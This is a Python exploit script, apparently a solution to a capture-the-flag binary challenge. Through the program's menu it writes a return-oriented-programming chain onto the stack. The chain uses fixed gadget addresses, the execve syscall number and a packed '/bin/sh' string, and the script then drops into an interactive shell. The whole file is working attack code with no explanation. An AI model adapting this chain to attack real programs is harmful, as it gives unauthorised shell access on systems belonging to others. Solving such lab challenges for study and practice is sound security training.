import interact
import struct

# Pack integer 'n' into a 8-Byte representation
def p64(n):
    return struct.pack('Q', n)

# Unpack 8-Byte-long string 's' into a Python integer
def u64(s):
    return struct.unpack('Q', s)[0]

p = interact.Process()
print(p.readuntil("name"))
p.sendline("zamnzamn")
print(p.readuntil("Choice:"))
p.sendline("1")
print(p.readuntil("Gadget: { ret }"))
p.sendline("1")
print(p.readuntil("at?"))
p.sendline("88")
print(p.readuntil("Choice:"))
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("104")
print(p.readuntil("Hex):"))
p.sendline("0x400af7")
print(p.readuntil("Choice:"))
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("112")
print(p.readuntil("Hex):"))
p.sendline("0x0")
print(p.readuntil("Choice:"))
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("120")
print(p.readuntil("Hex):"))
p.sendline("0x400af9")
print(p.readuntil("Choice:"))
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("128")
print(p.readuntil("Hex):"))
p.sendline("0x0")
print(p.readuntil("Choice:"))
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("136")
print(p.readuntil("Hex):"))
p.sendline("0x400afb")
print(p.readuntil("Choice:"))
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("144")
print(p.readuntil("Hex):"))
p.sendline("0x3b")
print(p.readuntil("Choice:"))
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("152")
print(p.readuntil("Hex):"))
p.sendline("0x400afd")
print(p.readuntil("Choice:"))

# point rdi to address with /bin/sh
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("208")
print(p.readuntil("Hex):"))
p.sendline("0x68732f6e69622f")
print(p.readuntil("Choice:"))
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("96")
print(p.readuntil("Hex):"))
p.sendline("0x7fffffffee50")

p.interactive()
